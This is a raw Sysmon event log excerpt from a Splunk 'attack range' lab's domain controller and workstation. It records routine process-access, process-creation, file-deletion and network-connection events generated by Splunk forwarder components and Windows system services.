10341000x8000000000000000285279Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E8A-6216-AC04-000000003802}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285278Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285277Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285276Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285275Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285274Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0E8A-6216-AC04-000000003802}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285273Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E8A-6216-AC04-000000003802}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285272Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:02.151{C8EA50B7-0E8A-6216-AC04-000000003802}1076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214462Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:03.640{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=245B192E39BB59513BD9B1F48D0AEE54,SHA256=7A6BDF99AD07877B022759E4748B89AB0B858DE4DDC78C7CCC67357A7C20B088,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:03.322{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D15F91A789C9587A255A09A0893434EC,SHA256=D711BB80F34B04F37C0A8E72EDBE5B5D8477534A0C672C64FE1C049D8EC0D55F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:03.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EE9A0DD128FD07F18D7CCF0AE5DEF0D,SHA256=92C48ABBB4958108123BC5F5A2D563BF0761D6DDC08870EF8E47DD459C29B608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:03.182{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D3D9F61544555FB52A1018EE3A967C04,SHA256=5276C9D874544773517E79E0B9F5843FCBAAA52162ECC7DC9D47820A7C9C74BF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214463Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:04.640{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D118F18C18DD34AAE1AB13EB2F6CBF4B,SHA256=8913E9F4C20D3F18EA1CD6F2466F9AF1BE2F749F816AD4F519A14C64D2DAE5B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285302Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.697{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5EE9A0DD128FD07F18D7CCF0AE5DEF0D,SHA256=92C48ABBB4958108123BC5F5A2D563BF0761D6DDC08870EF8E47DD459C29B608,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285301Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.339{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C0E9A50350FE5B1E5DDF0F36939729F,SHA256=91A17FCA6219C932A30ABEB1CE8B77A705DCA0703287645B2EE6BB40F6EC852B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000285300Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0E8C-6216-AE04-000000003802}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-0E8C-6216-AE04-000000003802}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000285294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0E8C-6216-AE04-000000003802}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000285293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.276{C8EA50B7-0E8C-6216-AE04-000000003802}2328C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214464Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:05.656{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62ACB3C8FF82F1A5284F3ABE02DEAFF0,SHA256=C4A71EEDFD5EC94364738FF9770C9C3BB40B595B645DA9C8E18B981CF166983E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285305Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:05.385{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A97AF8800AA5E1A33FB291B24EC2BE2,SHA256=439462184F23F9D0145563FC3A70DED1056F959E44572E2D18A8FD3F9AF5871B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285304Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:03.112{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53244-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000285303Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:03.112{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local53244-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000214465Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:06.656{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4946C0D96F855BCAF8DC9A28E27DAEDF,SHA256=7AFE271D7AC1DA6640ECEB37448A9B8685C5C2FCE94346852B300D3136E8F0FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285306Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:06.386{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=30C9B8F440A8EC420AC1C2584FCF3A5E,SHA256=463D68B7E1B32B45BBDFB07F618EC0DC0B259A85575369613AA6A7A8AE1F2179,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214467Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:07.671{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68374EBED6D2CAE4445064DF40B36CF1,SHA256=ABE7D50D64812F665C0BD9E97C57D6A63ECE694F142E5A7CF2F4FD93BB0CD1A7,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000285308Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:04.611{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53245-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285307Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:07.401{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF2140DF855DCADE58F6B54B7901CC87,SHA256=B0BF38FF8BE227A95EA0BC857EF529BF75DA6DDB184128B454A9F7E6375A5C81,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214466Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:04.658{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51190-false10.0.1.12-8000- 23542300x8000000000000000214468Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:08.687{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=403196312FF133C6D3B397AC5889CA1D,SHA256=CE540B6CC08392572A371E53EEA54AAE9FB6E5BA7AC8546149DC04B64786C7E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:08.416{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A6E9701A715C3F6BEC21C5249CA37FD,SHA256=0F0A15B915109BA581A09E1252CABE61FABA83A8E3FC123F8EDE368FBEB9217D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214469Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:09.703{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57B975465212804423CBC4E2368C2F18,SHA256=808A160F85A6A6FEAB662A1EAEAD49B0D007DE38BC90E3D67BA50FCD12DF9BA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:38:09.447{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=57FAD5505FF7D55CD61E71F68F090570,SHA256=CB6F1716AB73FFC05C31A8AAC7543D0CF431987FD1681D3636E6275FDA811D9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214470Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:38:10.781{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 